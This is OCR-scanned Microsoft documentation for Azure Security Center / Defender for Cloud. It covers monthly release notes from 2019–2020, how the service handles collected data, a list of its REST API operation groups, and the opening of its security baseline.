Advanced threat protection should be enabled on Azure Key Vault vaults 0e6763cc-5078-4e64-889d- 


ff4d9a839047 
Advanced threat protection should be enabled on Azure App Service 291302 1d-f2fd-4f3d-b958- 
plans £ 22354e2bdbcb 
Advanced threat protection should be enabled on Azure Container c25d9a16-bc35-4e15-a7e5- 
Registry registries 7 9db606bf9ed4 
Advanced threat protection should be enabled on Azure Kubernetes 523b5cd1-3e23-492f-a539- 
Service clusters Z 13118b6d1e3a 
Advanced threat protection should be enabled on Virtual Machines Z 4da35fc9-c9e7-4960-aec9- 
797fe7d9051d 


Learn more about Threat protection in Azure Security Center. 


May 2020 


Updates in May include: 


e Alert suppression rules (preview) 

e Virtual machine vulnerability assessment is now generally available 

e Changes to just-in-time (JIT) virtual machine (VM) access 

e Custom recommendations have been moved to a separate security control 
e Toggle added to view recommendations in controls or as a flat list 


e Expanded security control "Implement security best practices" 
e Custom policies with custom metadata are now generally available 
e Crash dump analysis capabilities migrating to fileless attack detection 


Alert suppression rules (preview) 


This new feature (currently in preview) helps reduce alert fatigue. Use rules to automatically hide alerts 
that are known to be innocuous or related to normal activities in your organization. This lets you focus 
on the most relevant threats. 


Alerts that match your enabled suppression rules will still be generated, but their state will be set to 
dismissed. You can see the state in the Azure portal or however you access your Security Center 
security alerts. 


Suppression rules define the criteria for which alerts should be automatically dismissed. Typically, you'd 
use a suppression rule to: 


e suppress alerts that you've identified as false positives 
e suppress alerts that are being triggered too often to be useful 


Learn more about suppressing alerts from Azure Security Center's threat protection. 


Virtual machine vulnerability assessment is now generally available 


Security Center's standard tier now includes an integrated vulnerability assessment for virtual machines 
for no additional fee. This extension is powered by Qualys but reports its findings directly back to 
Security Center. You don't need a Qualys license or even a Qualys account - everything's handled 
seamlessly inside Security Center. 


The new solution can continuously scan your virtual machines to find vulnerabilities and present the 
findings in Security Center. 


To deploy the solution, use the new security recommendation: 
“Enable the built-in vulnerability assessment solution on virtual machines (powered by Qualys)" 


Learn more about Security Center's integrated vulnerability assessment for virtual machines. 


Changes to just-in-time (JIT) virtual machine (VM) access 


Security Center includes an optional feature to protect the management ports of your VMs. This 
provides a defense against the most common form of brute force attacks. 


This update brings the following changes to this feature: 


e The recommendation that advises you to enable JIT on a VM has been renamed. Formerly, "Just- 
in-time network access control should be applied on virtual machines" it's now: "Management 
ports of virtual machines should be protected with just-in-time network access control". 


e The recommendation is triggered only if there are open management ports. 


Learn more about the JIT access feature. 


Custom recommendations have been moved to a separate security 
control 


One security control introduced with the enhanced secure score was "Implement security best 
practices". Any custom recommendations created for your subscriptions were automatically placed in 


that control. 


To make it easier to find your custom recommendations, we've moved them into a dedicated security 


control, "Custom recommendations”. This control has no impact on your secure score. 


Learn more about security controls in Enhanced secure score (preview) in Azure Security Center. 


Toggle added to view recommendations in controls or as a flat list 


Security controls are logical groups of related security recommendations. They reflect your vulnerable 
attack surfaces. A control is a set of security recommendations, with instructions that help you 


implement those recommendations. 


To immediately see how well your organization is securing each individual attack surface, review the 
scores for each security control. 


By default, your recommendations are shown in the security controls. From this update, you can also 
display them as a list. To view them as simple list sorted by the health status of the affected resources, 


use the new toggle 'Group by controls’. The toggle is above the list in the portal. 


The security controls - and this toggle - are part of the new secure score experience. Remember to 
send us your feedback from within the portal. 


Learn more about security controls in Enhanced secure score (preview) in Azure Security Center. 
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Each security control below represents a security risk you should mitigate. 
Address the recommendations in each control, focusing on the controls worth the most points. 
To get the max score, fix all recommendations for all resources in a control. Learn more > 


Group by controls: €D On 


Controls Potential score increase Unhealthy resources Resource Health 

> Remediate vulnerabilities + 9% (6 points) 37 of 50 resources ee 

> Enable encryption at rest + 5% (3 points) 28 of 51 resources 

> Secure management ports + 5% (3 points) 11 of 39 resources SE Ul 

> Manage access and permissions + 4% (2 points) 3 of 5 resources —E E 
> Protect applications against DDoS attacks + 3% (2 points) 2 of 29 resources = 

> Restrict unauthorized network access + 2% (1 point) 12 of 51 resources SEU 

> Enable endpoint protection + 2% (1 point) 23 of 44 resources I 
> Remediate security configurations + 2% (1 point) 12 of 48 resources aS lUlUlUlUl— 
> Apply system updates + 2% (1 point) 8 of 50 resources C 
> Enable auditing and logging + 1% (1 point) 43 of 56 resources B 
> Apply data classification + 1% (1 point) 4 of 12 resources = —™ 
> Apply adaptive application control + 1% (0 points) 5 of 39 resources =U 


Expanded security control "Implement security best practices" 


One security control introduced with the enhanced secure score is "Implement security best practices”. 


When a recommendation is in this control, it doesn't impact the secure score. 


With this update, three recommendations have moved out of the controls in which they were originally 
placed, and into this best practices control. We've taken this step because we've determined that the 


risk of these three recommendations is lower than was initially thought. 
In addition, two new recommendations have been introduced and added to this control. 


The three recommendations that moved are: 


e MFA should be enabled on accounts with read permissions on your subscription (originally in 


the "Enable MFA" control) 

e External accounts with read permissions should be removed from your subscription (originally 
in the "Manage access and permissions" control) 

e A maximum of 3 owners should be designated for your subscription (originally in the "Manage 


access and permissions" control) 
The two new recommendations added to the control are: 


e Guest configuration extension should be installed on Windows virtual machines (Preview) - 
Using Azure Policy Guest Configuration provides visibility inside virtual machines to server and 


application settings (Windows only). 


e Windows Defender Exploit Guard should be enabled on your machines (Preview) - Windows 
Defender Exploit Guard leverages the Azure Policy Guest Configuration agent. Exploit Guard has 
four components that are designed to lock down devices against a wide variety of attack vectors 
and block behaviors commonly used in malware attacks while enabling enterprises to balance 


their security risk and productivity requirements (Windows only). 
Learn more about Windows Defender Exploit Guard in Create and deploy an Exploit Guard policy. 


Learn more about security controls in Enhanced secure score (preview). 


Custom policies with custom metadata are now generally available 


Custom policies are now part of the Security Center recommendations experience, secure score, and 
the regulatory compliance standards dashboard. This feature is now generally available and allows you 


to extend your organization's security assessment coverage in Security Center. 


Create a custom initiative in Azure Policy, add policies to it and onboard it to Azure Security Center, 


and visualize it as recommendations. 


We've now also added the option to edit the custom recommendation metadata. Metadata options 
include severity, remediation steps, threats information, and more. 


Learn more about enhancing your custom recommendations with detailed information. 


Crash dump analysis capabilities migrating to fileless attack 
detection 


We are integrating the Windows crash dump analysis (CDA) detection capabilities into fileless attack 
detection. Fileless attack detection analytics brings improved versions of the following security alerts 
for Windows machines: Code injection discovered, Masquerading Windows Module Detected, Shell 


code discovered, and Suspicious code segment detected. 
Some of the benefits of this transition: 


e Proactive and timely malware detection - The CDA approach involved waiting for a crash to 
occur and then running analysis to find malicious artifacts. Using fileless attack detection brings 
proactive identification of in-memory threats while they are running. 


e Enriched alerts - The security alerts from fileless attack detection include enrichments that aren't 


available from CDA, such as the active network connections information. 


e Alert aggregation - When CDA detected multiple attack patterns within a single crash dump, it 
triggered multiple security alerts. Fileless attack detection combines all of the identified attack 
patterns from the same process into a single alert, removing the need to correlate multiple alerts. 


e Reduced requirements on your Log Analytics workspace - Crash dumps containing potentially 
sensitive data will no longer be uploaded to your Log Analytics workspace. 


April 2020 


Updates in April include: 


e Dynamic compliance packages are now generally available 
e Identity recommendations now included in Azure Security Center free tier 


Dynamic compliance packages are now generally available 


The Azure Security Center regulatory compliance dashboard now includes dynamic compliance 
packages (now generally available) to track additional industry and regulatory standards. 


Dynamic compliance packages can be added to your subscription or management group from the 
Security Center security policy page. When you've onboarded a standard or benchmark, the standard 
appears in your regulatory compliance dashboard with all associated compliance data mapped as 
assessments. A summary report for any of the standards that have been onboarded will be available to 


download. 
Now, you can add standards such as: 


e NIST SP 800-53 R4 

e SWIFT CSP CSCF-v2020 

e UK Official and UK NHS 

e Canada Federal PBMM 

e Azure CIS 1.1.0 (new) (which is a more complete representation of Azure CIS 1.1.0) 


In addition, we've recently added the Azure Security Benchmark, the Microsoft-authored Azure-specific 
guidelines for security and compliance best practices based on common compliance frameworks. 
Additional standards will be supported in the dashboard as they become available. 


Learn more about customizing the set of standards in your regulatory compliance dashboard. 


Identity recommendations now included in Azure Security Center 
free tier 


Security recommendations for identity and access on the Azure Security Center free tier are now 


generally available. This is part of the effort to make the cloud security posture management (CSPM) 
features free. Until now, these recommendations were only available on the standard pricing tier. 


Examples of identity and access recommendations include: 


e "Multi-factor authentication should be enabled on accounts with owner permissions on your 
subscription." 

e "A maximum of three owners should be designated for your subscription." 

e "Deprecated accounts should be removed from your subscription." 


If you have subscriptions on the free pricing tier, their secure scores will be impacted by this change 
because they were never assessed for their identity and access security. 


Learn more about identity and access recommendations. 


Learn more about Managing multi-factor authentication (MFA) enforcement on your subscriptions. 


March 2020 


Updates in March include: 


e Workflow automation is now generally available 

e Integration of Azure Security Center with Windows Admin Center 
e Protection for Azure Kubernetes Service 

e Improved just-in-time experience 


e Two security recommendations for web applications deprecated 


Workflow automation is now generally available 


The workflow automation feature of Azure Security Center is now generally available. Use it to 
automatically trigger Logic Apps on security alerts and recommendations. In addition, manual triggers 
are available for alerts and all recommendations that have the quick fix option available. 


Every security program includes multiple workflows for incident response. These processes might 
include notifying relevant stakeholders, launching a change management process, and applying 
specific remediation steps. Security experts recommend that you automate as many steps of those 
procedures as you can. Automation reduces overhead and can improve your security by ensuring the 
process steps are done quickly, consistently, and according to your predefined requirements. 


For more information about the automatic and manual Security Center capabilities for running your 


workflows, see workflow automation. 


Learn more about creating Logic Apps. 


Integration of Azure Security Center with Windows Admin Center 


It's now possible to move your on-premises Windows servers from the Windows Admin Center directly 
to the Azure Security Center. Security Center then becomes your single pane of glass to view security 
information for all your Windows Admin Center resources, including on-premises servers, virtual 


machines, and additional PaaS workloads. 
After moving a server from Windows Admin Center to Azure Security Center, you'll be able to: 


e View security alerts and recommendations in the Security Center extension of the Windows 
Admin Center. 

e View the security posture and retrieve additional detailed information of your Windows Admin 
Center managed servers in the Security Center within the Azure portal (or via an API). 


Learn more about how to integrate Azure Security Center with Windows Admin Center. 


Protection for Azure Kubernetes Service 


Azure Security Center is expanding its container security features to protect Azure Kubernetes Service 
(AKS). 


The popular, open-source platform Kubernetes has been adopted so widely that it's now an industry 
standard for container orchestration. Despite this widespread implementation, there's still a lack of 
understanding regarding how to secure a Kubernetes environment. Defending the attack surfaces of a 
containerized application requires expertise to ensuring the infrastructure is configured securely and 
constantly monitored for potential threats. 


The Security Center defense includes: 


e Discovery and visibility - Continuous discovery of managed AKS instances within the 
subscriptions registered to Security Center. 

e Security recommendations - Actionable recommendations to help you comply with security 
best-practices for AKS. These recommendations are included in your secure score to ensure 
they're viewed as a part of your organization's security posture. An example of an AKS-related 
recommendation you might see is "Role-based access control should be used to restrict access to 
a Kubernetes service cluster". 

e Threat protection - Through continuous analysis of your AKS deployment, Security Center alerts 
you to threats and malicious activity detected at the host and AKS cluster level. 


Learn more about Azure Kubernetes Services' integration with Security Center. 


Learn more about the container security features in Security Center. 


Improved just-in-time experience 


The features, operation, and UI for Azure Security Center's just-in-time tools that secure your 


management ports have been enhanced as follows: 


e Justification field - When requesting access to a virtual machine (VM) through the just-in-time 
page of the Azure portal, a new optional field is available to enter a justification for the request. 
Information entered into this field can be tracked in the activity log. 

e Automatic cleanup of redundant just-in-time (JIT) rules - Whenever you update a JIT policy, a 
cleanup tool automatically runs to check the validity of your entire ruleset. The tool looks for 
mismatches between rules in your policy and rules in the NSG. If the cleanup tool finds a 
mismatch, it determines the cause and, when it's safe to do so, removes built-in rules that aren't 


needed anymore. The cleaner never deletes rules that you've created. 


Learn more about the JIT access feature. 


Two security recommendations for web applications deprecated 
Two security recommendations related to web applications are being deprecated: 


e The rules for web applications on laaS NSGs should be hardened. (Related policy: The NSGs rules 
for web applications on laaS should be hardened) 


e Access to App Services should be restricted. (Related policy: Access to App Services should be 


restricted [preview]) 


These recommendations will no longer appear in the Security Center list of recommendations. The 
related policies will no longer be included in the initiative named "Security Center Default". 


Learn more about security recommendations. 


February 2020 


Fileless attack detection for Linux (preview) 


As attackers increasing employ stealthier methods to avoid detection, Azure Security Center is 
extending fileless attack detection for Linux, in addition to Windows. Fileless attacks exploit software 
vulnerabilities, inject malicious payloads into benign system processes, and hide in memory. These 
techniques: 


e minimize or eliminate traces of malware on disk 


e greatly reduce the chances of detection by disk-based malware scanning solutions 


To counter this threat, Azure Security Center released fileless attack detection for Windows in October 
2018, and has now extended fileless attack detection on Linux as well. 


January 2020 


Enhanced secure score (preview) 


An enhanced version of the secure score feature of Azure Security Center is now available in preview. 
In this version, multiple recommendations are grouped into Security Controls that better reflect your 
vulnerable attack surfaces (for example, restrict access to management ports). 


Familiarize yourself with the secure score changes during the preview phase and determine other 
remediations that will help you to further secure your environment. 


Learn more about enhanced secure score (preview). 


November 2019 


Updates in November include: 


e Threat Protection for Azure Key Vault in North America regions (preview) 

e Threat Protection for Azure Storage includes Malware Reputation Screening 
e Workflow automation with Logic Apps (preview) 

e Quick Fix for bulk resources generally available 

e Scan container images for vulnerabilities (preview) 

e Additional regulatory compliance standards (preview) 

e Threat Protection for Azure Kubernetes Service (preview) 

e Virtual machine vulnerability assessment (preview) 

e Advanced data security for SQL servers on Azure Virtual Machines (preview) 
e Support for custom policies (preview) 


e Extending Azure Security Center coverage with platform for community and partners 
e Advanced integrations with export of recommendations and alerts (preview) 
e Onboard on-premises servers to Security Center from Windows Admin Center (preview) 


Threat Protection for Azure Key Vault in North America Regions 
(preview) 


Azure Key Vault is an essential service for protecting data and improving performance of cloud 
applications by offering the ability to centrally manage keys, secrets, cryptographic keys and policies in 
the cloud. Since Azure Key Vault stores sensitive and business critical data, it requires maximum 
security for the key vaults and the data stored in them. 


Azure Security Center's support for Threat Protection for Azure Key Vault provides an additional layer 
of security intelligence that detects unusual and potentially harmful attempts to access or exploit key 
vaults. This new layer of protection allows customers to address threats against their key vaults without 
being a security expert or manage security monitoring systems. The feature is in public preview in 
North America Regions. 


Threat Protection for Azure Storage includes Malware Reputation 
Screening 


Threat protection for Azure Storage offers new detections powered by Microsoft Threat Intelligence for 
detecting malware uploads to Azure Storage using hash reputation analysis and suspicious access from 
an active Tor exit node (an anonymizing proxy). You can now view detected malware across storage 
accounts using Azure Security Center. 


Workflow automation with Logic Apps (preview) 


Organizations with centrally managed security and IT/operations implement internal workflow 
processes to drive required action within the organization when discrepancies are discovered in their 
environments. In many cases, these workflows are repeatable processes and automation can greatly 


streamline processes within the organization. 


Today we are introducing a new capability in Security Center that allows customers to create 
automation configurations leveraging Azure Logic Apps and to create policies that will automatically 
trigger them based on specific ASC findings such as Recommendations or Alerts. Azure Logic App can 
be configured to do any custom action supported by the vast community of Logic App connectors, or 
use one of the templates provided by Security Center such as sending an email or opening a 
ServiceNow™ ticket. 


For more information about the automatic and manual Security Center capabilities for running your 
workflows, see workflow automation. 


To learn about creating Logic Apps, see Azure Logic Apps. 


Quick Fix for bulk resources generally available 


With the many tasks that a user is given as part of Secure Score, the ability to effectively remediate 
issues across a large fleet can become challenging. 


To simplify remediation of security misconfigurations and to be able to quickly remediate 


recommendations on a bulk of resources and improve your secure score, use Quick Fix remediation. 


This operation will allow you to select the resources you want to apply the remediation to and launch a 


remediation action that will configure the setting on your behalf. 
Quick fix is generally available today customers as part of the Security Center recommendations page. 


See which recommendations have quick fix enabled in the reference guide to security 


recommendations. 


Scan container images for vulnerabilities (preview) 
Azure Security Center can now scan container images in Azure Container Registry for vulnerabilities. 


The image scanning works by parsing the container image file, then checking to see whether there are 
any known vulnerabilities (pbowered by Qualys). 


The scan itself is automatically triggered when pushing new container images to Azure Container 
Registry. Found vulnerabilities will surface as Security Center recommendations and included in the 
secure score together with information on how to patch them to reduce the attack surface they 
allowed. 


Additional regulatory compliance standards (preview) 


The Regulatory Compliance dashboard provides insights into your compliance posture based on 
Security Center assessments. The dashboard shows how your environment complies with controls and 
requirements designated by specific regulatory standards and industry benchmarks and provides 
prescriptive recommendations for how to address these requirements. 


The regulatory compliance dashboard has thus far supported four built-in standards: Azure CIS 1.1.0, 
PCI-DSS, ISO 27001, and SOC-TSP. We are now announcing the public preview release of additional 
supported standards: NIST SP 800-53 R4, SWIFT CSP CSCF v2020, Canada Federal PBMM and UK 
Official together with UK NHS. We are also releasing an updated version of Azure CIS 1.1.0, covering 
more controls from the standard and enhancing extensibility. 


Learn more about customizing the set of standards in your regulatory compliance dashboard. 


Threat Protection for Azure Kubernetes Service (preview) 


Kubernetes is quickly becoming the new standard for deploying and managing software in the cloud. 
Few people have extensive experience with Kubernetes and many only focuses on general engineering 
and administration and overlook the security aspect. Kubernetes environment needs to be configured 
carefully to be secure, making sure no container focused attack surface doors are not left open is 
exposed for attackers. Security Center is expanding its support in the container space to one of the 
fastest growing services in Azure - Azure Kubernetes Service (AKS). 


The new capabilities in this public preview release include: 


e Discovery & Visibility - Continuous discovery of managed AKS instances within Security Center's 
registered subscriptions. 

e Secure Score recommendations - Actionable items to help customers comply with security best 
practices for AKS, and increase their secure score. Recommendations include items such as "Role- 
based access control should be used to restrict access to a Kubernetes Service Cluster”. 

e Threat Detection - Host and cluster-based analytics, such as "A privileged container detected". 


Virtual machine vulnerability assessment (preview) 


Applications that are installed in virtual machines could often have vulnerabilities that could lead to a 
breach of the virtual machine. We are announcing that the Security Center standard tier includes built- 
in vulnerability assessment for virtual machines for no additional fee. The vulnerability assessment, 
powered by Qualys in the public preview, will allow you to continuously scan all the installed 
applications on a virtual machine to find vulnerable applications and present the findings in the 
Security Center portal's experience. Security Center takes care of all deployment operations so that no 
extra work is required from the user. Going forward we are planning to provide vulnerability 
assessment options to support our customers’ unique business needs. 


Learn more about vulnerability assessments for your Azure Virtual Machines. 


Advanced data security for SQL servers on Azure Virtual Machines 
(preview) 


Azure Security Center's support for threat protection and vulnerability assessment for SQL DBs running 


on laaS VMs is now in preview. 


Vulnerability assessment is an easy to configure service that can discover, track, and help you 
remediate potential database vulnerabilities. It provides visibility into your security posture as part of 
secure score and includes the steps to resolve security issues and enhance your database fortifications. 


Advanced threat protection detects anomalous activities indicating unusual and potentially harmful 
attempts to access or exploit your SQL server. It continuously monitors your database for suspicious 
activities and provides action-oriented security alerts on anomalous database access patterns. These 
alerts provide the suspicious activity details and recommended actions to investigate and mitigate the 
threat. 


Support for custom policies (preview) 
Azure Security Center now supports custom policies (in preview). 


Our customers have been wanting to extend their current security assessments coverage in Security 
Center with their own security assessments based on policies that they create in Azure Policy. With 
support for custom policies, this is now possible. 


These new policies will be part of the Security Center recommendations experience, Secure Score, and 
the regulatory compliance standards dashboard. With the support for custom policies, you're now able 


to create a custom initiative in Azure Policy, then add it as a policy in Security Center and visualize it as 


a recommendation. 


Extending Azure Security Center coverage with platform for 
community and partners 


Use Security Center to receive recommendations not only from Microsoft but also from existing 
solutions from partners such as Check Point, Tenable, and CyberArk with many more integrations 
coming. Security Center's simple onboarding flow can connect your existing solutions to Security 
Center, enabling you to view your security posture recommendations in a single place, run unified 
reports and leverage all of Security Center's capabilities against both built-in and partner 
recommendations. You can also export Security Center recommendations to partner products. 


Learn more about Microsoft Intelligent Security Association £ . 


Advanced integrations with export of recommendations and alerts 
(preview) 


In order to enable enterprise level scenarios on top of Security Center, it's now possible to consume 
Security Center alerts and recommendations in additional places except the Azure portal or API. These 
can be directly exported to an event hub and to Log Analytics workspaces. Here are a few workflows 
you can create around these new capabilities: 


e With export to Log Analytics workspace, you can create custom dashboards with Power BI. 
e With export to Event Hubs, you'll be able to export Security Center alerts and recommendations 
to your third-party SIEMs, to a third-party solution, or Azure Data Explorer. 


Onboard on-premises servers to Security Center from Windows 
Admin Center (preview) 


Windows Admin Center is a management portal for Windows Servers who are not deployed in Azure 
offering them several Azure management capabilities such as backup and system updates. We have 
recently added an ability to onboard these non-Azure servers to be protected by ASC directly from the 
Windows Admin Center experience. 


With this new experience users will be to onboard a WAC server to Azure Security Center and enable 
viewing its security alerts and recommendations directly in the Windows Admin Center experience. 


September 2019 


Updates in September include: 


e Managing rules with adaptive application controls improvements 
e Control container security recommendation using Azure Policy 


Managing rules with adaptive application controls improvements 


The experience of managing rules for virtual machines using adaptive application controls has 
improved. Azure Security Center's adaptive application controls help you control which applications 
can run on your virtual machines. In addition to a general improvement to rule management, a new 


benefit enables you to control which file types will be protected when you add a new rule. 


Learn more about adaptive application controls. 


Control container security recommendation using Azure Policy 


Azure Security Center's recommendation to remediate vulnerabilities in container security can now be 
enabled or disabled via Azure Policy. 


To view your enabled security policies, from Security Center open the Security Policy page. 


August 2019 


Updates in August include: 


e Just-in-time (JIT) VM access for Azure Firewall 
e Single click remediation to boost your security posture (preview) 


e Cross-tenant management 


Just-in-time (JIT) VM access for Azure Firewall 


Just-in-time (JIT) VM access for Azure Firewall is now generally available. Use it to secure your Azure 
Firewall protected environments in addition to your NSG protected environments. 


JIT VM access reduces exposure to network volumetric attacks by providing controlled access to VMs 
only when needed, using your NSG and Azure Firewall rules. 


When you enable JIT for your VMs, you create a policy that determines the ports to be protected, how 
long the ports are to remain open, and approved IP addresses from where these ports can be 
accessed. This policy helps you stay in control of what users can do when they request access. 


Requests are logged in the Azure Activity Log, so you can easily monitor and audit access. The just-in- 
time page also helps you quickly identify existing VMs that have JIT enabled and VMs where JIT is 


recommended. 


Learn more about Azure Firewall. 


Single click remediation to boost your security posture (preview) 


Secure score is a tool that helps you assess your workload security posture. It reviews your security 
recommendations and prioritizes them for you, so you know which recommendations to perform first. 


This helps you find the most serious security vulnerabilities to prioritize investigation. 


In order to simplify remediation of security misconfigurations and help you to quickly improve your 
secure score, we've added a new capability that allows you to remediate a recommendation on a bulk 


of resources in a single click. 


This operation will allow you to select the resources you want to apply the remediation to and launch a 
remediation action that will configure the setting on your behalf. 


See which recommendations have quick fix enabled in the reference guide to security 


recommendations. 


Cross-tenant management 


Security Center now supports cross-tenant management scenarios as part of Azure Lighthouse. This 
enables you to gain visibility and manage the security posture of multiple tenants in Security Center. 


Learn more about cross-tenant management experiences. 


July 2019 


Updates to network recommendations 


Azure Security Center (ASC) has launched new networking recommendations and improved some 
existing ones. Now, using Security Center ensures even greater networking protection for your 


resources. 


Learn more about network recommendations. 


June 2019 


Adaptive network hardening - generally available 


One of the biggest attack surfaces for workloads running in the public cloud are connections to and 
from the public Internet. Our customers find it hard to know which Network Security Group (NSG) rules 
should be in place to make sure that Azure workloads are only available to required source ranges. 
With this feature, Security Center learns the network traffic and connectivity patterns of Azure 
workloads and provides NSG rule recommendations, for Internet facing virtual machines. This helps 
our customer better configure their network access policies and limit their exposure to attacks. 


Learn more about adaptive network hardening. 


Microsoft Defender for Cloud data 
security 
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To help customers prevent, detect, and respond to threats, Microsoft Defender for Cloud 
collects and processes security-related data, including configuration information, 
metadata, event logs, and more. Microsoft adheres to strict compliance and security 
guidelines—from coding to operating a service. 


This article explains how data is managed and safeguarded in Defender for Cloud. 


Data sources 


Defender for Cloud analyzes data from the following sources to provide visibility into 
your security state, identify vulnerabilities and recommend mitigations, and detect active 
threats: 


e Azure services: Uses information about the configuration of Azure services you 
have deployed by communicating with that service's resource provider. 

e Network traffic: Uses sampled network traffic metadata from Microsoft's 
infrastructure, such as source/destination IP/port, packet size, and network 
protocol. 

e Partner solutions: Uses security alerts from integrated partner solutions, such as 
firewalls and antimalware solutions. 

e Your machines: Uses configuration details and information about security events, 


such as Windows event and audit logs, and syslog messages from your machines. 


Data sharing 


When you enable Defender for Storage Malware Scanning, it may share metadata, 
including metadata classified as customer data (e.g. SHA-256 hash), with Microsoft 
Defender for Endpoint. 


Data protection 


Data segregation 


Data is kept logically separate on each component throughout the service. All data is 
tagged per organization. This tagging persists throughout the data lifecycle, and it's 
enforced at each layer of the service. 


Data access 


To provide security recommendations and investigate potential security threats, 
Microsoft personnel may access information collected or analyzed by Azure services, 
including process creation events, and other artifacts, which may unintentionally include 
customer data or personal data from your machines. 


We adhere to the Microsoft Online Services Data Protection Addendum”, which states 
that Microsoft won't use customer data or derive information from it for any advertising 
or similar commercial purposes. We only use customer data as needed to provide you 
with Azure services, including purposes compatible with providing those services. You 
retain all rights to customer data. 


Data use 


Microsoft uses patterns and threat intelligence seen across multiple tenants to enhance 
our prevention and detection capabilities; we do so in accordance with the privacy 
commitments described in our Privacy Statement”. 


Manage data collection from machines 


When you enable Defender for Cloud in Azure, data collection is turned on for each of 
your Azure subscriptions. You can also enable data collection for your subscriptions in 
Defender for Cloud. When data collection is enabled, Defender for Cloud provisions the 
Log Analytics agent on all existing supported Azure virtual machines and any new ones 
that are created. 


The Log Analytics agent scans for various security-related configurations and events it 
into Event Tracing for Windows (ETW) traces. In addition, the operating system raises 
event log events during the course of running the machine. Examples of such data are: 
operating system type and version, operating system logs (Windows event logs), 
running processes, machine name, IP addresses, logged in user, and tenant ID. The Log 
Analytics agent reads event log entries and ETW traces and copies them to your 
workspace(s) for analysis. The Log Analytics agent also enables process creation events 
and command line auditing. 


If you aren't using Microsoft Defender for Cloud's enhanced security features, you can 
also disable data collection from virtual machines in the Security Policy. Data Collection 
is required for subscriptions that are protected by enhanced security features. VM disk 
snapshots and artifact collection will still be enabled even if data collection has been 
disabled. 


You can specify the workspace and region where data collected from your machines is 
stored. The default is to store data collected from your machines in the nearest 
workspace as shown in the following table: 


VM Geo Workspace Geo 
United States, Brazil, South Africa United States 
Canada Canada 
Europe (excluding United Kingdom) Europe 
United Kingdom United Kingdom 
Asia (excluding India, Japan, Korea, China) Asia Pacific 
Korea Asia Pacific 
India India 
Japan Japan 
China China 
Australia Australia 

© Note 


Microsoft Defender for Storage stores artifacts regionally according to the location 
of the related Azure resource. Learn more in Overview of Microsoft Defender for 


Storage. 


Data consumption 


Customers can access Defender for Cloud related data from the following data streams: 


Stream Data types 


Azure Activity log All security alerts, approved Defender for Cloud just-in-time access 
requests, and all alerts generated by adaptive application controls. 


Stream Data types 
Azure Monitor logs All security alerts. 


Azure Resource Graph Security alerts, security recommendations, vulnerability assessment 
results, secure score information, status of compliance checks, and more. 


Microsoft Defender Security alerts, security recommendations, and more. 
for Cloud REST API 


Next steps 


In this document, you learned how data is managed and safeguarded in Microsoft 
Defender for Cloud. 


To learn more about Microsoft Defender for Cloud, see What is Microsoft Defender for 
Cloud?. 


Microsoft Defender for Cloud 
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Microsoft Defender for Cloud provides unified security management and advanced 


threat protection across hybrid cloud workloads. With Defender for Cloud, you can 


apply security policies across your workloads, limit your exposure to threats, and detect 


and respond to attacks. 


REST Operation Groups 


Operation Group 
API Collections 


Adaptive Application Controls 


Adaptive Network Hardenings 
Advanced Threat Protection 
Alerts 

Alerts Suppression Rules 
Allowed Connections 
Assessments 

Assessments Metadata 
Assignments 

Auto Provisioning Settings 
Automations 

Compliances 

Connectors 


Device Security Groups 


Discovered Security Solutions 


External Security Solutions 


Description 


Discover, manage, and view security insights for API collections. 


Configuration of application control rules on groups of 
VMs/servers. 


Controls for Adaptive Network Hardening resources and rules. 
Advanced Threat Protection settings on a specified resource. 
Alerts on security events that happened on the subscription. 
View and edit alert suppression rules. 

Lists the permissible traffic routes between resources. 
Manage security assessments. 

Manage metadata for the security assessments. 

Manage assignments of compliance initiatives. 

Auto provisioning settings of the subscriptions. 

Manage security automations. 

Details of specific compliance initiatives. 

Manage cloud connectors for multicloud scenarios. 


Manage the device security group for a specified loT Hub 
resource. 


Details of specific discovered Security Solution. 


External Security Solutions for the subscription and location. 


Operation Group 

Information Protection Policies 
lot Alert Types 

lot Alerts 

lot Recommendation Types 

lot Recommendations 


lot Security Solution 


lot Security Solution Analytics 


lot Security Solutions Analytics 
Aggregated Alert 


lot Security Solutions Analytics 
Recommendation 


Jit Network Access Policies 


Locations 
Operations 
Pricings 


Regulatory Compliance 
Assessments 


Regulatory Compliance 
Controls 


Regulatory Compliance 
Standards 


Secure Score Control 
Definitions 


Secure Score Controls 


Secure Scores 


Security Contacts 


Settings 


Description 

Details of the information protection policies. 
Details of an loT alert type. 

Get the loT alerts. 

Get loT recommendation types. 

Get loT recommendations. 


Manage your loT Security solution by name, resource group, 
subscription, or tag. 


List loT Security Analytics metrics. 


Manage an aggregated loT Security Solution Alert. 


Get the aggregated security analytics recommendation of your 
loT Security solution. 


Policies for protecting resources using Just-in-Time access 
control. 


Details of specific locations. 
All available operations. 
Security pricing configuration in the resource group. 


Get the details and state of your regulatory compliance or the 
assessments mapped to them. 


Get the details and state of your regulatory compliance 
controls. 


Get the details and state of your supported regulatory 
compliance standards. 


List the available security controls, their assessments, and the 
max score. 


Get all security controls within a scope or for a specific 
initiative. 


Get secure score for a specific Defender for Cloud initiative or 
List secure scores for all your Defender for Cloud initiatives. 


Security contact configurations for the subscription. 


Configuration settings for Defender for Cloud. 


Operation Group 
Sub Assessments 


Tasks 


Topology 


Workspace Settings 


Description 
Get a security sub-assessment on your scanned resources. 


Recommended tasks that will help improve the security of the 
subscription proactively. 


Get a topology view of a subscription, location, or component. 


Settings about where we should store your security data and 
logs. 


Azure security baseline for Microsoft 
Defender for Cloud 
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This security baseline applies guidance from the Microsoft cloud security benchmark 
version 1.0 to Microsoft Defender for Cloud. The Microsoft cloud security benchmark 
provides recommendations on how you can secure your cloud solutions on Azure. The 
content is grouped by the security controls defined by the Microsoft cloud security 
benchmark and the related guidance applicable to Microsoft Defender for Cloud. 


You can monitor this security baseline and its recommendations using Microsoft 
Defender for Cloud. Azure Policy definitions will be listed in the Regulatory Compliance 
section of the Microsoft Defender for Cloud portal page. 


When a feature has relevant Azure Policy Definitions, they are listed in this baseline to 
help you measure compliance with the Microsoft cloud security benchmark controls and 
recommendations. Some recommendations may require a paid Microsoft Defender plan 
to enable certain security scenarios. 


O Note 


Features not applicable to Microsoft Defender for Cloud have been excluded. To 
see how Microsoft Defender for Cloud completely maps to the Microsoft cloud 
security benchmark, see the full Microsoft Defender for Cloud security baseline 
mapping file”. 


Security profile 


The security profile summarizes high-impact behaviors of Microsoft Defender for Cloud, 
which may result in increased security considerations. 


Service Behavior Attribute Value 
Product Category Security 
Customer can access HOST / OS No Access 
Service can be deployed into customer's virtual network False 


Stores customer content at rest True 


Network security 


For more information, see the Microsoft cloud security benchmark: Network security. 
